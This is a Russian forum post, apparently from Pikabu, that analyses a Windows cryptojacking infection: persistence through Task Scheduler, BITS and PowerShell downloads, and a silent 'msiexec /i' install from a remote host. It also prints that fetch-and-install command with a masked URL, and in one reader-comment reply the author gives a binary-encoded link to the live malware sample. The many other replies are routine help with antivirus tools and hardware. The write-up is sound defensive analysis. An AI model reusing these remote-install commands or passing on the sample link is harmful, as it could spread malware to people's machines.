6440

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

DELETED
Автор поста оценил этот комментарий

ви еслиб работали в ит знали бы интересные факты.

раскрыть ветку (1)
64
DELETED
Автор поста оценил этот комментарий

Я сам физик, не айтишник

показать ответы
511
DELETED
Автор поста оценил этот комментарий

Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса.

Это задержка в 5 сек. перед выполнением команды Del.

раскрыть ветку (1)
253
DELETED
Автор поста оценил этот комментарий

Спасибо, интересный факт

показать ответы
9
Автор поста оценил этот комментарий

Какие антивирусы с этой фигней сами справляются?

К примеру тот же Касперский может эту хреньку увидеть и уничтожить?

раскрыть ветку (1)
33
DELETED
Автор поста оценил этот комментарий

Касперский выпилил только уже загруженные файлы, после перезагрузки эта шняга пошла качаться заново. А вот забугорный от Malwarebytes (не реклама, а совет), уже добил файл и почистил планировщик заданий. Но стоит забугорный в 2 раза дороже касперского, у нас им мало кто пользуется, есть только одноразовая бесплатная демка, но она справляется.

показать ответы
21
Автор поста оценил этот комментарий

Вычистить?

Запустите ПК в безопасном режиме и проверьте его DRWeb CureIt! и tdsskiller.

Можете после этого самостоятельно проверить все службы через services.msc, автозагрузку, прочекать процессы в памяти на VirusTotal через переименованный в случайное имя ProcessExplorer.

раскрыть ветку (1)
27
DELETED
Автор поста оценил этот комментарий

Кстати, один из тех вирусов, что стоял на том компе блочил вход в безопаску.

показать ответы
2
Автор поста оценил этот комментарий

А ссылочку, будь ласков.

Думаю модеры не будут возбухать

раскрыть ветку (1)
23
DELETED
Автор поста оценил этот комментарий

За исполняемыми - гугл по словам "Malwarebytes", "MBAM", даже статья на вики есть: https://ru.wikipedia.org/wiki/Malwarebytes

показать ответы
6
Автор поста оценил этот комментарий
А можно ли зная логин-пароль от майнинг-сервера увести крипту горе-хакера?
раскрыть ветку (1)
22
DELETED
Автор поста оценил этот комментарий

Хах, таки нет, всю жизнь об этом мечтал, но это нужен RSA private-key, а тут только public-key, по нему только намайнить туда можно.

показать ответы
Автор поста оценил этот комментарий

То есть каспер это хороший антивирь? Самим-то не смешно?

раскрыть ветку (1)
20
DELETED
Автор поста оценил этот комментарий

Заметьте, я этого не говорил. Я вообще о результатах проверки каспера не говорил, не то, что о своём мнении. В других комментах я сказал, что он удалил только половину файлов вирусов, но это позволило мне запустить хотя бы MBAM на зараженной системе. У каждого антивиря есть минусы. Касперский просто был под линукс, что позволяет запускать его с LiveUSB.

показать ответы
6
Автор поста оценил этот комментарий

Может написать программу которая будет ему отправлять какой-нибудь бред, шифруя его RSA ключом?

раскрыть ветку (1)
10
DELETED
Автор поста оценил этот комментарий

Хм, интересная мысль, но работа идет через прокси-майнинг сервер, скорее всего сервер просто кикнет такого клиента, поидее ведь должна быть какая-то проверка, хотя-бы CRC. Хотя в такие дебри майнинга я не вдавался, всё может быть.

показать ответы
0
Автор поста оценил этот комментарий
ТС, а есть виртуалка с вин10, затестить там заведется вирус или нет, или залей куда-нибудь вирус, посмотрю сам.
раскрыть ветку (1)
10
DELETED
Автор поста оценил этот комментарий

Если есть желание покопаться - вот, что между буквами f и r:
1100111 1101111 1101111 1011111 1100111 1101100 101111 1101010 1001010 111001 1100100 110100 1010110
Остальной алгоритм знаете.
ВНИМАНИЕ! Кто захочет повторить - всё на свой страх и риск! Я к разработчикам этого ПО отношения не имею, что их софт может сделать с системой - не знаю.
Файл будет храниться 5 дней, после он будет удалён, потом уже ищите сами.
P.S. модер, если нарушаю, можете удалить сообщение

показать ответы
1
Автор поста оценил этот комментарий

я закинул в карантин всю эту куеву тучу...

через пару недель прога встанет. Карантин не высыпется назад в систему?

раскрыть ветку (1)
10
DELETED
Автор поста оценил этот комментарий

Снесешь просто прогу как будет триалка заканчиваться, и всё. Если понадобится восстановить - после переустановки проги карантин по-моему даже на месте будет.

показать ответы
14
Автор поста оценил этот комментарий

Умно) Тогда LiveCD, наверное.

раскрыть ветку (1)
9
DELETED
Автор поста оценил этот комментарий

Он и вырулил отчасти. Линукс запустил, потом уже прошелся каспером для линукс.

показать ответы
3
Автор поста оценил этот комментарий

Мда...

6 вредных от какого-то Microleaves...

и 324 нежелательных.

Каспер молчит сука.

раскрыть ветку (1)
9
DELETED
Автор поста оценил этот комментарий

Он даже у меня на компе 3 каких-то случайных штуки нашарил, написанных на дельфи, хотя я слежу как спецагент за своими процессами.

показать ответы
12
Автор поста оценил этот комментарий
Спасибо, не подскажите дельный совет, я свой ПК обычно в гибернацию отправляю, но он из нее самопроизвольно просыпается, я уже убирал в ресурсах чтобы он от Клавы и мыши не просыпался, и гуглил что в cmd что-то прописывать надо. Но снова просыпания начались. Это может Майнер?
раскрыть ветку (1)
18
DELETED
Автор поста оценил этот комментарий

Не факт, может какие-то устройства типо флешек или сетевухи поднимают систему, подробнее здесь гляньте, есть пара дельных советов там: http://www.cyberforum.ru/windows8/thread1156201.html

показать ответы
10
DELETED
Автор поста оценил этот комментарий

Есть небольшое предложение к Вам. Конечно, не факт, что это поможет, но можно попробовать написать регистратору домена и (или) хостинг-провайдеру (если таковой имеется) о том, для чего используется этот сайт. Скорее всего, они заблокируют автора.


Как я понимаю, сам инсталлятор загружается с него в последствии, и это может немного, да приостановить распространение заразы. Но могу ошибаться во всём.

раскрыть ветку (1)
6
DELETED
Автор поста оценил этот комментарий

Пробовал, пишет домен зареган на reg.ru, но в зоне com, типо конкретно рег не может отозвать домен, это надо в какую-то международную комиссию писать, + этих зеркал очень много может быть на один айпишник сервера

26
Автор поста оценил этот комментарий

"В автозагрузке, повторюсь всё в порядке"

Чтобы посмотреть, в порядке там или нет, надо хотя бы Autoruns от мистера Руссиновича запускать, а не этот стандартный.

раскрыть ветку (1)
16
DELETED
Автор поста оценил этот комментарий

Честно, конкретно про Autoruns был не в курсах, для себя обычно юзал разные сторонние проги, а в посте показал просто самый "ламерский" способ, чтобы было понятно, что на первый взгляд ничего подозрительного там нет. В следующий раз если попадется, покажу скрины что в авторансе творится.

показать ответы
2
Автор поста оценил этот комментарий
Я видел майнер, который закрывался при открытии диспетчера задач. Так что тут не все однозначно
раскрыть ветку (1)
4
DELETED
Автор поста оценил этот комментарий

Как вариант - переименовать стандартный диспетчер в что-то вроде supermgr2281488.exe и запустить. Если софт убивает по названию процесса.

показать ответы
22
Автор поста оценил этот комментарий
Жадность им этого не дает сделать. Там по 75% грузят в мацнере
раскрыть ветку (1)
4
DELETED
Автор поста оценил этот комментарий

И донаты автором программ до 1% снижают, ниже некуда. В оригинале 5, но ещё 4% хотят отхавать себе.

Автор поста оценил этот комментарий
Внимание, вопрос: когда у ТС последний раз был секс?))
раскрыть ветку (1)
3
DELETED
Автор поста оценил этот комментарий

Ну вы поняли

Иллюстрация к комментарию
0
Автор поста оценил этот комментарий

Господа хацкеры, создатель темы. У меня очень часто система грузит ЦП либо память под 100%. Хотя в редкие моменты когда на мой взгляд она работает нормально, там не больше 10% без программ. Dr Web Cruel пробовал не помогает. Может быть вы сможете мне помочь?

раскрыть ветку (1)
3
DELETED
Автор поста оценил этот комментарий

Когда работает нормально, интернет подключен? Попробуйте для начала отключить LAN кабель или сетевуху/роутер т.е. чтобы грубо прервать доступ к серваку без возможности программно его вернуть. Если нагрузка упадет - значит минёры сидят, т.к. они свои данные получают по сети. Если нет - значит какие-то местные шифровщики работают. Да и в диспетчере задач (taskmgr) можно тупо глянуть по ЦП и по памяти в разделе процессы, там пишется загрузка для каждого процесса, где будет 80-100, от него и пляшете, для начала убейте его (завершить задачу), если опять возникает - лечить комп

показать ответы
4
Автор поста оценил этот комментарий

Да ладно тебе, не критикуй так яростно. Видно, что человек старался, и неплохо получилось, кстати)

раскрыть ветку (1)
3
DELETED
Автор поста оценил этот комментарий

Не, я согласен, в этом месте ступил, но нет особо времени каждую статью заверять настолько тщательно, стараюсь концентрироваться на содержании, а не оформлении.

показать ответы
0
DELETED
Автор поста оценил этот комментарий

то есть там пак вирусов, но ставился только майнер?

раскрыть ветку (1)
3
DELETED
Автор поста оценил этот комментарий

Светился только майнер :) окно с ошибкой вылетело после каспера, когда он половину файлов из того пака посносил. Да и синее окошко тоже, до этого буквально на долю секунды оно появлялось.

2
Автор поста оценил этот комментарий
На первом скриншоте окно с ошибкой исполнения кода Autoit. Его не изучали?
Он прекрасно декомпилируется.
раскрыть ветку (1)
3
DELETED
Автор поста оценил этот комментарий

Это соседний вирус, там их целая куча была, AutoIT сам декомпилировал и изучал методы его обфускации, было как-то дело. Я думал, что оно тоже к этому вирю относится, но нет, это сторонее что-то.

показать ответы
Автор поста оценил этот комментарий

Driver Pack Solution вам в помощь

раскрыть ветку (1)
5
DELETED
Автор поста оценил этот комментарий

Лучше не надо, чаще всего вместе с ним какие-нибудь вируса и приходят, сразу же прямо на новую Ось. Обычные драйвера в zip-архивах или на крайняк exe/msi установщики от производителя.

показать ответы
0
Автор поста оценил этот комментарий

А не, не всё. У них разъёмы различаются в зависимости от марок (ноутов и дисков собственно)?

раскрыть ветку (1)
1
DELETED
Автор поста оценил этот комментарий

У всех более-менее современных ноутбуков там всегда стоит SATA2 / SATA3. Можете снять жесткий диск и посмотреть, как он выглядит. Есть диски с другими разъемами, но это частные случаи, которые обычно ставят мастера (т.е. мы), зная при этом, что они делают и для чего. Обычный потребительский диск SATA. Были старые-престарые ноутбуки с параллельным разъемом, но они щас уже практически не встречаются, да и SSD под такие не делают. Вряд-ли у вас такой.

показать ответы
0
Автор поста оценил этот комментарий
А можно найти того кто использовал этот майнер?
раскрыть ветку (1)
1
DELETED
Автор поста оценил этот комментарий

Нельзя, там прокси-майнинг, никаких следов. Майнить через него так может кто угодно, как вирусописатель, так и обычный юзер.

3
Автор поста оценил этот комментарий
Спасибо нашел 81 зараженный файл, пару от мейлов, куча от днс, и еще куча от какогото zaxbara. Стоял антивирус 360. Нече не видел.
раскрыть ветку (1)
1
DELETED
Автор поста оценил этот комментарий

Забыл уточнить! Если есть какие-то лоадеры на винде, может их снести, потом придется из карантина восстанавливать. Антивирь расчитан под лицушную винду.

показать ответы
0
Автор поста оценил этот комментарий

Так много возни,что даже страшно.По времени  - лучше просто переустановить ОС,поставить NOD32 SS. А программы(любые) устанавливать только по мере необходимости.Так же стоит при установке NOD32,сделать снимок системы.При интенсивном использовании ПК такой переустановки хватает минимум на год.Друзьям и знакомым я в основном предлагаю переустановку.И всегда отключаю "автоматическое обновление". Иначе ПК может начать тормозить на следующий же день.Всем удачи.

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Когда-то и меня вела дорога приключений..

0
Автор поста оценил этот комментарий
Добрый человек, спасибо вам!Спустя время дошли руки поменять жесткий диск и о чудо!ноут ожил)
раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Конечно ожил. Кстати, у меня сегодня стал дико лагать комп, я уже думал, навернулся основной хард - надо бабки тратить, оказалось что это стал стучать второй диск, про который я забыл, который даже в диспетчере был отключен - и от него вся система раком вставала. Мне достаточно было его просто отключить от питания. Но старым ноутам замена НЖМД хорошо помогает

0
Автор поста оценил этот комментарий

у меня сетевуха будила, причем из спящего режима, из гибернации при этом не просыпался.

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Ну из гибернации и не должно т.к. сон это по сути отключение периферии, чаще всего даже просто дисплея и кулеров, а вот гибернация это выгружаются данные из оперативы на диск и отключается питание всей системы.

0
Автор поста оценил этот комментарий

Я имею ввиду, это всё ставится на место прежнего, внутрь ноута. Просто не путаю ли я его с квадраной хренью на проводе с которой я киношки на телике включаю)

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

На проводе то внешний накопитель. А так да, внутрь ноута, разъем у них совместим с жесткими дисками.

показать ответы
0
Автор поста оценил этот комментарий

Я уж извиняюсь за навязчивость, получается нужно заменить жесткий диск?я не силён в терминологии.

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Жесткий диск заменить на SSD-диск. Для ноутов он лучше по многим причинам: меньше энергопотребление, меньше вероятность сломаться от удара/отключения электричества. Ну и скорость выше.

показать ответы
0
Автор поста оценил этот комментарий

Я почему спрашиваю, у меня ноут старый до жути тупит, даже после обнуления  windows.. тупит даже когда ничего не делает, даже там где не должен тупить. Особенно когда дело касается браузера, в нем просыпается демон и говорит "ну щас я тебя за#бууу!"))

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Поставьте SSD диск на него, потом чистую ось и удивитесь.. У них тупо изнашиваются харды, скорость чтения-записи падает в ноль. Мой ноут 2006 года вместе с SSD пашет как новый с днса за 20-25к.

показать ответы
0
Автор поста оценил этот комментарий

Вобщем простому смертному от подобных гадостей не избавиться?

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Можно поставить демку какого-нибудь платного антивируса, например Malwarebytes Anti-Malware или другого, который работает неделю и за это время вычистит комп полностью, а потом удалить, не покупая и какое-то время он будет чистый.

показать ответы
0
Автор поста оценил этот комментарий

Так я не понял -  у тебя появилась возможность влезть в кошелек ублюдка, ты это сделал?

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Возможность не появилась - у меня только хэш, мастер-ключ у автора) Если бы была, сразу бы залез и отчитался. Это не так работает.

показать ответы
Автор поста оценил этот комментарий

хранибох вирусовписателей. благодаря им у меня будет на что купить пивас

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

не вирусовписателей, а мелкософт, благодаря которому эти вирусы и пишутся, да и даже без вирусов при установке обновлений даже лиц. винда часто крашится в хлам так, что не может потом стартануть.

0
Автор поста оценил этот комментарий
Здравствуйте!) Помогите, пожалуйста, удалить вирус от Мэйла. Его не видит ни один антивирус, а теперь вообще не даёт проверить ничего, настолько глубоко вирус залез в систему. Он открывает в браузере рекламу в новой вкладке. Как можно удалить его?
раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Проверьте при помощи Malwarebytes Anti-Malware, если оный не стартует - подключите диск к сторонней системе или используйте LiveUSB, и запустите проверку на вирусный софт.

показать ответы
0
Автор поста оценил этот комментарий

Вопрос наверное не в тему... но не подскажите как бороться с обновлениями или от чего можно избавиться в винде 10, что бы в фотошопе не выскакивало окошко «недостаточно оперативной памяти». Все методы доступные широкому кругу уже были испробованы( остался варианта с прописанием памяти в регистре, но это ад. Кроме фш в таком случае ничего не работает) приходится каждый раз удалять и прописывать заново((((( ноутбук Новый, все работало отлично. Недели две назад было очередное обновление и все, приехали, стало невозможно работать.

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Как вариант - откатить плохие обновы и запретить автоустановку, как вариант - докинуть планку памяти, если они сменные.

0
Автор поста оценил этот комментарий

Какой антивирус использовать? Какой обеспечит защиту? У меня на данный момент 360 Total Security - посоветовали.

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Что 360, что Avast, что Avira, что McAfee - это лишь слабенькая защитка от каких-то школьных баннеров. Лучший антивирус - сам юзер, но если реально не хотите заморачиваться - только платные решения: Касперский, DrWeb и Malwarebytes и ещё несколько. Остальной софт просто не заинтересован в какой-либо защите пользователя.

показать ответы
0
Автор поста оценил этот комментарий

@Kekovsky,

Недавно сам обнаружил достаточно интересный майнер. Маскируется под Svhost.exe, грузит 50% i5 3.4ghz, потому заметить сразу, что в системе что-то не так - сложно, ибо всё ещё нормально работают игры и все приложения, обнаружил, что что-то не так, только по возросшей температуре в простое и уже потом начал разбираться. Если закрыть процесс, то запускается планировщиком через 10 минут заново. Вирус не позволяет запустить сторонний диспетчер задач и некоторые антивирусы, а так же в браузере блокирует сайты с антивирусными программами, которые способные его обнаружить. Сайты с антивирусами, которые его не находят, вполне доступны. Dr. web cureit абсолютно беспомощен и не находит ничего. Подцепил вирус при установке kms активатора, потому сообщения от винды об опасности приложения, естественно проигнорировал, так как это стандартная вещь.

Удалил его достаточно просто и одновременно достаточно костыльным способом - остановил процесс и в течении этих 10 минут, смог зайти на сайт, скачал malwareby и запустил сканирование.

Кто-то сильно заморочился

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Скорее всего замешан язык AutoIt, один из самых популярных языков для написания вирусов и подобных прог.

0
Автор поста оценил этот комментарий

@Kekovsky, а можно как то архив получить? Хочется рабочую песочницу потестировать.

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

ищите в комментах

1
Автор поста оценил этот комментарий

Правильно, я когда устанавливал дрова, запустил его. Он реально помог, но вместе с этим при каждом запуске у меня висело по 6-8 программ неизвестного мне назначения и устанавливались всякие оперы,амиго, яндекс бар и ещё какая-нибудь дичь. Причём обычномю юзверю никак это говно не вычистить. Пришлось снова переустанавливать винду.

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Я один раз так какие-то редкие дрова из него вытягивал - на модем. Не было их в зипе, хоть убей, пришлось на виртуалку DRP, потом оттуда уже из загрузок нужные мне файлы.

0
Автор поста оценил этот комментарий

А если просто откатить ос встроенными средствами на дату до внесения изменений в планировщик?

раскрыть ветку (1)
DELETED
Автор поста оценил этот комментарий

Какие-то костыльные решения